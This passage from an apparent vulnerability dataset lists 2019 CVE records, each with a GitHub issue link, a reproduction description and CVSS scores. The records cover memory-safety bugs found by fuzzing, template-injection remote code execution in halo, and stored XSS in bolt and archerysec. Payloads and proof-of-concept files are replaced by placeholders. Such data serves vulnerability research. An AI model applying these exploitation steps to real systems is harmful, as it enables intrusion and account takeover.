right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  41336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  41337. "severity": "CRITICAL",
  41338. "baseScore": 9.1,
  41339. "impactScore": 5.2,
  41340. "exploitabilityScore": 3.9
  41341. },
  41342. {
  41343. "CVE_ID": "CVE-2019-19952",
  41344. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1791",
  41345. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1791",
  41346. "Repo_new": "imagemagick/imagemagick",
  41347. "Issue_Created_At": "2019-11-27T06:48:11Z",
  41348. "description": "heap use after free in APITAG of coders/png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free vulnerability in function APITAG of coders/png.c whick can be reproduced as below. Steps to Reproduce APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  41349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41350. "severity": "CRITICAL",
  41351. "baseScore": 9.8,
  41352. "impactScore": 5.9,
  41353. "exploitabilityScore": 3.9
  41354. },
  41355. {
  41356. "CVE_ID": "CVE-2019-19957",
  41357. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/197",
  41358. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/197",
  41359. "Repo_new": "mz-automation/libiec61850",
  41360. "Issue_Created_At": "2019-12-24T08:51:15Z",
  41361. "description": "APITAG in APITAG in PATHTAG There is a out bound read vulnerability in APITAG because APITAG doesn't check APITAG , APITAG arguments. So APITAG and APITAG can be very large number. APITAG poc: FILETAG result in gdb: CODETAG",
  41362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41363. "severity": "MEDIUM",
  41364. "baseScore": 6.5,
  41365. "impactScore": 3.6,
  41366. "exploitabilityScore": 2.8
  41367. },
  41368. {
  41369. "CVE_ID": "CVE-2019-19958",
  41370. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/198",
  41371. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/198",
  41372. "Repo_new": "mz-automation/libiec61850",
  41373. "Issue_Created_At": "2019-12-24T09:08:24Z",
  41374. "description": "integer signedness in APITAG in PATHTAG APITAG 's second argument is size which is a signed integer. If attacker supply a negtive number like NUMBERTAG APITAG will try to alloc a very large buffer that is size NUMBERTAG ffffffff in NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff in NUMBERTAG bit arch. Most of the time alloc will failed then memcpy will get segment fault. APITAG poc: FILETAG gdb results: ERRORTAG",
  41375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41376. "severity": "MEDIUM",
  41377. "baseScore": 6.5,
  41378. "impactScore": 3.6,
  41379. "exploitabilityScore": 2.8
  41380. },
  41381. {
  41382. "CVE_ID": "CVE-2019-19999",
  41383. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/419",
  41384. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/419",
  41385. "Repo_new": "halo-dev/halo",
  41386. "Issue_Created_At": "2019-12-11T10:44:41Z",
  41387. "description": "A Server Side Freemarker template injection vulnerability could cause remote command execution. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG RCE code is APITAG Then visit an arbitrary ERRORTAG page, this vulnerability is triggered. such as http: PATHTAG FILETAG",
  41388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  41389. "severity": "HIGH",
  41390. "baseScore": 7.2,
  41391. "impactScore": 5.9,
  41392. "exploitabilityScore": 1.2
  41393. },
  41394. {
  41395. "CVE_ID": "CVE-2019-19999",
  41396. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/440",
  41397. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/440",
  41398. "Repo_new": "halo-dev/halo",
  41399. "Issue_Created_At": "2019-12-24T15:49:53Z",
  41400. "description": "unsafe template file permissions edit cause Server Side Template Injection(SSTI). APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) ] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG Save the file and refresh home page,and then ceye platform can receive a message FILETAG Execute system command also edit \"page APITAG to execute system command to add system user. payload NUMBERTAG APITAG FILETAG save the file again and refresh home page APITAG will add user in the system FILETAG Remark Because the preview does not display the picture properly when editing the issus, you can visit my github project( URLTAG and view the picture. Solution Template files can only be edited locally, or check the file input",
  41401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  41402. "severity": "HIGH",
  41403. "baseScore": 7.2,
  41404. "impactScore": 5.9,
  41405. "exploitabilityScore": 1.2
  41406. },
  41407. {
  41408. "CVE_ID": "CVE-2019-20008",
  41409. "Issue_Url_old": "https://github.com/archerysec/archerysec/issues/338",
  41410. "Issue_Url_new": "https://github.com/archerysec/archerysec/issues/338",
  41411. "Repo_new": "archerysec/archerysec",
  41412. "Issue_Created_At": "2019-12-03T02:59:59Z",
  41413. "description": "Stored XSS on the scheduler projects list. Upon a security analysis of the platform, a stored cross site scripting vulnerability was identified on the Web and Infrastructure Scan Scheduler's project dropdown selection. The payload is present on the project name attribute, but it is only executed upon javascript interaction by the Select2 library utilized on that specific menu. Upon deletion of the PATHTAG file, the vulnerability was not present anymore (as were the library functionalities). The vulnerability is not present on the python interactions, it is the live search function from select2 that evaluates and (possibly) decodes HTML Entities from the payload. How To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project with the name \" ERRORTAG NUMBERTAG Click \" Launch Scans \" on the left side menu NUMBERTAG Proceed to either \" Dynamic Scans \" or \" Infrastructure Scans NUMBERTAG Click \" Scan Schedule NUMBERTAG Click the project dropdown selection Expected behavior After reproducing the steps above, a pop up should appear prompting the user with NUMBERTAG",
  41414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  41415. "severity": "MEDIUM",
  41416. "baseScore": 5.4,
  41417. "impactScore": 2.7,
  41418. "exploitabilityScore": 2.3
  41419. },
  41420. {
  41421. "CVE_ID": "CVE-2019-20009",
  41422. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/176",
  41423. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/176",
  41424. "Repo_new": "libredwg/libredwg",
  41425. "Issue_Created_At": "2019-12-24T03:44:32Z",
  41426. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf APITAG APITAG input will lead to Memory allocation failed in dwg_decode_SPLINE_private APITAG APITAG URLTAG ASAN says: ERRORTAG Thanks, Linhlhq from Infiniti Team, APITAG (a member of Vingroup)",
  41427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41428. "severity": "MEDIUM",
  41429. "baseScore": 6.5,
  41430. "impactScore": 3.6,
  41431. "exploitabilityScore": 2.8
  41432. },
  41433. {
  41434. "CVE_ID": "CVE-2019-20016",
  41435. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/84",
  41436. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/84",
  41437. "Repo_new": "hoene/libmysofa",
  41438. "Issue_Created_At": "2019-10-31T07:31:18Z",
  41439. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in dataobject.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa2 URLTAG The ASAN information is as follows: ERRORTAG about code: CODETAG",
  41440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41441. "severity": "MEDIUM",
  41442. "baseScore": 6.5,
  41443. "impactScore": 3.6,
  41444. "exploitabilityScore": 2.8
  41445. },
  41446. {
  41447. "CVE_ID": "CVE-2019-20016",
  41448. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/83",
  41449. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/83",
  41450. "Repo_new": "hoene/libmysofa",
  41451. "Issue_Created_At": "2019-10-31T07:21:20Z",
  41452. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in fractalhead.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa1 URLTAG The ASAN information is as follows: ERRORTAG gdb debug info: ERRORTAG about code: ERRORTAG",
  41453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41454. "severity": "MEDIUM",
  41455. "baseScore": 6.5,
  41456. "impactScore": 3.6,
  41457. "exploitabilityScore": 2.8
  41458. },
  41459. {
  41460. "CVE_ID": "CVE-2019-20017",
  41461. "Issue_Url_old": "https://github.com/tbeu/matio/issues/127",
  41462. "Issue_Url_new": "https://github.com/tbeu/matio/issues/127",
  41463. "Repo_new": "tbeu/matio",
  41464. "Issue_Created_At": "2019-11-07T03:14:45Z",
  41465. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
  41466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41467. "severity": "MEDIUM",
  41468. "baseScore": 6.5,
  41469. "impactScore": 3.6,
  41470. "exploitabilityScore": 2.8
  41471. },
  41472. {
  41473. "CVE_ID": "CVE-2019-20018",
  41474. "Issue_Url_old": "https://github.com/tbeu/matio/issues/129",
  41475. "Issue_Url_new": "https://github.com/tbeu/matio/issues/129",
  41476. "Repo_new": "tbeu/matio",
  41477. "Issue_Created_At": "2019-11-07T03:27:18Z",
  41478. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackoverflow APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41480. "severity": "MEDIUM",
  41481. "baseScore": 6.5,
  41482. "impactScore": 3.6,
  41483. "exploitabilityScore": 2.8
  41484. },
  41485. {
  41486. "CVE_ID": "CVE-2019-20019",
  41487. "Issue_Url_old": "https://github.com/tbeu/matio/issues/130",
  41488. "Issue_Url_new": "https://github.com/tbeu/matio/issues/130",
  41489. "Repo_new": "tbeu/matio",
  41490. "Issue_Created_At": "2019-11-07T03:44:40Z",
  41491. "description": "it is a memory exhaustion issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
  41492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41493. "severity": "MEDIUM",
  41494. "baseScore": 6.5,
  41495. "impactScore": 3.6,
  41496. "exploitabilityScore": 2.8
  41497. },
  41498. {
  41499. "CVE_ID": "CVE-2019-20020",
  41500. "Issue_Url_old": "https://github.com/tbeu/matio/issues/128",
  41501. "Issue_Url_new": "https://github.com/tbeu/matio/issues/128",
  41502. "Repo_new": "tbeu/matio",
  41503. "Issue_Created_At": "2019-11-07T03:23:25Z",
  41504. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG ERRORTAG",
  41505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41506. "severity": "MEDIUM",
  41507. "baseScore": 6.5,
  41508. "impactScore": 3.6,
  41509. "exploitabilityScore": 2.8
  41510. },
  41511. {
  41512. "CVE_ID": "CVE-2019-20021",
  41513. "Issue_Url_old": "https://github.com/upx/upx/issues/315",
  41514. "Issue_Url_new": "https://github.com/upx/upx/issues/315",
  41515. "Repo_new": "upx/upx",
  41516. "Issue_Created_At": "2019-11-14T03:04:37Z",
  41517. "description": "There is a heap buffer overflow in the APITAG function of APITAG A crafted input will lead to crash in p_mach.cpp at UP NUMBERTAG latest version,git clone from branch devel) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41518. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41519. "severity": "MEDIUM",
  41520. "baseScore": 5.5,
  41521. "impactScore": 3.6,
  41522. "exploitabilityScore": 1.8
  41523. },
  41524. {
  41525. "CVE_ID": "CVE-2019-20022",
  41526. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/108",
  41527. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/108",
  41528. "Repo_new": "saitoha/libsixel",
  41529. "Issue_Created_At": "2019-12-11T08:22:08Z",
  41530. "description": "Segmentation fault (ASAN: SEGV on unknown address) in the load_pnm function of APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG Triggered by: ./img2sixel NUMBERTAG SEGV load pnm NUMBERTAG Poc NUMBERTAG SEGV load pnm NUMBERTAG URLTAG The gdb debug info: ERRORTAG",
  41531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41532. "severity": "MEDIUM",
  41533. "baseScore": 6.5,
  41534. "impactScore": 3.6,
  41535. "exploitabilityScore": 2.8
  41536. },
  41537. {
  41538. "CVE_ID": "CVE-2019-20023",
  41539. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/120",
  41540. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/120",
  41541. "Repo_new": "saitoha/libsixel",
  41542. "Issue_Created_At": "2019-12-18T05:03:40Z",
  41543. "description": "A memory leaks issue in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG ) Triggered by: ./img2sixel NUMBERTAG memleak rpl_malloc Poc NUMBERTAG memleak rpl_malloc URLTAG The ASAN info: ERRORTAG about code: ERRORTAG",
  41544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41545. "severity": "MEDIUM",
  41546. "baseScore": 6.5,
  41547. "impactScore": 3.6,
  41548. "exploitabilityScore": 2.8
  41549. },
  41550. {
  41551. "CVE_ID": "CVE-2019-20024",
  41552. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/121",
  41553. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/121",
  41554. "Repo_new": "saitoha/libsixel",
  41555. "Issue_Created_At": "2019-12-18T05:10:27Z",
  41556. "description": "A heap buffer overflow in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG Triggered by: ./img2sixel NUMBERTAG heap Poc NUMBERTAG heap URLTAG The ASAN info: ERRORTAG about code: CODETAG",
  41557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41558. "severity": "MEDIUM",
  41559. "baseScore": 6.5,
  41560. "impactScore": 3.6,
  41561. "exploitabilityScore": 2.8
  41562. },
  41563. {
  41564. "CVE_ID": "CVE-2019-20051",
  41565. "Issue_Url_old": "https://github.com/upx/upx/issues/313",
  41566. "Issue_Url_new": "https://github.com/upx/upx/issues/313",
  41567. "Repo_new": "upx/upx",
  41568. "Issue_Created_At": "2019-11-13T10:02:39Z",
  41569. "description": "Floating point exception abort APITAG in APITAG of APITAG A crafted input will lead to crash in APITAG at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41570. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41571. "severity": "MEDIUM",
  41572. "baseScore": 5.5,
  41573. "impactScore": 3.6,
  41574. "exploitabilityScore": 1.8
  41575. },
  41576. {
  41577. "CVE_ID": "CVE-2019-20052",
  41578. "Issue_Url_old": "https://github.com/tbeu/matio/issues/131",
  41579. "Issue_Url_new": "https://github.com/tbeu/matio/issues/131",
  41580. "Repo_new": "tbeu/matio",
  41581. "Issue_Created_At": "2019-11-12T05:36:29Z",
  41582. "description": "it is a memory leaks issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG memleak URLTAG The ASAN information is as follows: ERRORTAG",
  41583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41584. "severity": "MEDIUM",
  41585. "baseScore": 6.5,
  41586. "impactScore": 3.6,
  41587. "exploitabilityScore": 2.8
  41588. },
  41589. {
  41590. "CVE_ID": "CVE-2019-20053",
  41591. "Issue_Url_old": "https://github.com/upx/upx/issues/314",
  41592. "Issue_Url_new": "https://github.com/upx/upx/issues/314",
  41593. "Repo_new": "upx/upx",
  41594. "Issue_Created_At": "2019-11-14T01:57:00Z",
  41595. "description": "Segmentation fault (ASAN: SEGV on unknown address) in the APITAG function of APITAG A crafted input will lead to crash in p_lx_elf.cpp at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41596. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41597. "severity": "MEDIUM",
  41598. "baseScore": 5.5,
  41599. "impactScore": 3.6,
  41600. "exploitabilityScore": 1.8
  41601. },
  41602. {
  41603. "CVE_ID": "CVE-2019-20056",
  41604. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/126",
  41605. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/126",
  41606. "Repo_new": "saitoha/libsixel",
  41607. "Issue_Created_At": "2019-12-29T13:43:51Z",
  41608. "description": "assertion failure in stbi__shiftsigned in stb_image.h. stbi__shiftsigned has assertion which can be triggered by user supplied image file. FILETAG poc: FILETAG result: ERRORTAG",
  41609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41610. "severity": "MEDIUM",
  41611. "baseScore": 6.5,
  41612. "impactScore": 3.6,
  41613. "exploitabilityScore": 2.8
  41614. },
  41615. {
  41616. "CVE_ID": "CVE-2019-20057",
  41617. "Issue_Url_old": "https://github.com/ProxymanApp/Proxyman/issues/364",
  41618. "Issue_Url_new": "https://github.com/proxymanapp/proxyman/issues/364",
  41619. "Repo_new": "proxymanapp/proxyman",
  41620. "Issue_Created_At": "2019-12-29T04:38:45Z",
  41621. "description": "Helper Tool: Security Vulnerability . \ud83d\udc36 Brief There is a report from a dedicated user that Proxyman Helper Tool APITAG be exploited to change the System Proxy from unsigned apps. Basically, it's the same issue with Little Snitch CVETAG URLTAG since Proxyman and Little Snitch use a same FILETAG and we don't validate the codesign of incoming APITAG APITAG does good job to demonstrate how to install/uninstall the Help Tool and provide a mechanism to verify which app is authorized to do it. However, it doesn't validate the authenticity of the connections. As a result, Any apps could exploited by sending the connection to Helper Tool, which has the same APITAG We should fix it \ud83d\udc51 Criteria [ ] Validate the codesign of connections before performing any System Change [ ] Make sure one Helper Tool could verify and accept the Proxyman's Connection. [ ] Use POC sample code to verify that the new Helper Tool will reject the unauthorized connections",
  41622. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  41623. "severity": "LOW",
  41624. "baseScore": 3.7,
  41625. "impactScore": 1.4,
  41626. "exploitabilityScore": 2.2
  41627. },
  41628. {
  41629. "CVE_ID": "CVE-2019-20058",
  41630. "Issue_Url_old": "https://github.com/bolt/bolt/issues/7830",
  41631. "Issue_Url_new": "https://github.com/bolt/bolt/issues/7830",
  41632. "Repo_new": "bolt/bolt",
  41633. "Issue_Created_At": "2019-12-17T13:13:09Z",
  41634. "description": "Unauthenticated Stored Cross Site Scripting (XSS) Admin Account Takeover NUMBERTAG Bug Summary: Stored Cross Site Scripting: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Scenario: When an end user is searching ( URLTAG for any results logs are being generated in admin panel ( FILETAG an end user inputs malicious payload such as URL Encoded: APITAG Decoded: APITAG Javascript is being executed on Database page of the admin panel ( URLTAG and unauthenticated attacker can use such malicious payloads to perform various exploits and APITAG keylogger, CSRF Token APITAG Aware Keylogger,etc NUMBERTAG Steps to Reproduce: Navigate to URLTAG Click on Search Input payload from above FILETAG To validate the finding login to admin console and navigate to URLTAG and select the log with payload navigate to database ( URLTAG Selecting Logs: FILETAG Navigating to Database: FILETAG Payload Executed: FILETAG NUMBERTAG Mitigation: Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur. References: URLTAG url URLTAG url URLTAG url FILETAG URLTAG url",
  41635. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  41636. "severity": "MEDIUM",
  41637. "baseScore": 6.1,
  41638. "impactScore": 2.7,
  41639. "exploitabilityScore": 2.8
  41640. },
  41641. {
  41642. "CVE_ID": "CVE-2019-20063",
  41643. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/67",
  41644. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/67",
  41645. "Repo_new": "hoene/libmysofa",
  41646. "Issue_Created_At": "2019-08-24T08:52:47Z",
  41647. "description": "Uninitialized use found in mysofa2json FILETAG )",
  41648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41649. "severity": "HIGH",
  41650. "baseScore": 8.8,
  41651. "impactScore": 5.9,
  41652. "exploitabilityScore": 2.8
  41653. },
  41654. {
  41655. "CVE_ID": "CVE-2019-20086",
  41656. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/74",
  41657. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/74",
  41658. "Repo_new": "gopro/gpmf-parser",
  41659. "Issue_Created_At": "2019-10-15T07:06:48Z",
  41660. "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC file FILETAG ERRORTAG",
  41661. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41662. "severity": "HIGH",
  41663. "baseScore": 8.8,
  41664. "impactScore": 5.9,
  41665. "exploitabilityScore": 2.8
  41666. },
  41667. {
  41668. "CVE_ID": "CVE-2019-20087",
  41669. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/76",
  41670. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/76",
  41671. "Repo_new": "gopro/gpmf-parser",
  41672. "Issue_Created_At": "2019-10-15T07:16:17Z",
  41673. "description": "heapoverflow in APITAG GPMF APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
  41674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41675. "severity": "HIGH",
  41676. "baseScore": 8.8,
  41677. "impactScore": 5.9,
  41678. "exploitabilityScore": 2.8
  41679. },
  41680. {
  41681. "CVE_ID": "CVE-2019-20088",
  41682. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/77",
  41683. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/77",
  41684. "Repo_new": "gopro/gpmf-parser",
  41685. "Issue_Created_At": "2019-10-15T07:21:55Z",
  41686. "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
  41687. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41688. "severity": "HIGH",
  41689. "baseScore": 7.8,
  41690. "impactScore": 5.9,
  41691. "exploitabilityScore": 1.8
  41692. },
  41693. {
  41694. "CVE_ID": "CVE-2019-20089",
  41695. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/75",
  41696. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/75",
  41697. "Repo_new": "gopro/gpmf-parser",
  41698. "Issue_Created_At": "2019-10-15T07:11:52Z",
  41699. "description": "heapoverflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC FILETAG POC ERRORTAG",
  41700. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41701. "severity": "HIGH",
  41702. "baseScore": 7.8,
  41703. "impactScore": 5.9,
  41704. "exploitabilityScore": 1.8
  41705. },
  41706. {
  41707. "CVE_ID": "CVE-2019-20090",
  41708. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/461",
  41709. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/461",
  41710. "Repo_new": "axiomatic-systems/bento4",
  41711. "Issue_Created_At": "2019-12-09T08:53:39Z",
  41712. "description": "use after free in APITAG ./mp NUMBERTAG ts $poc out poc FILETAG asan output ERRORTAG",
  41713. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41714. "severity": "HIGH",
  41715. "baseScore": 7.8,
  41716. "impactScore": 5.9,
  41717. "exploitabilityScore": 1.8
  41718. },
  41719. {
  41720. "CVE_ID": "CVE-2019-20091",
  41721. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/462",
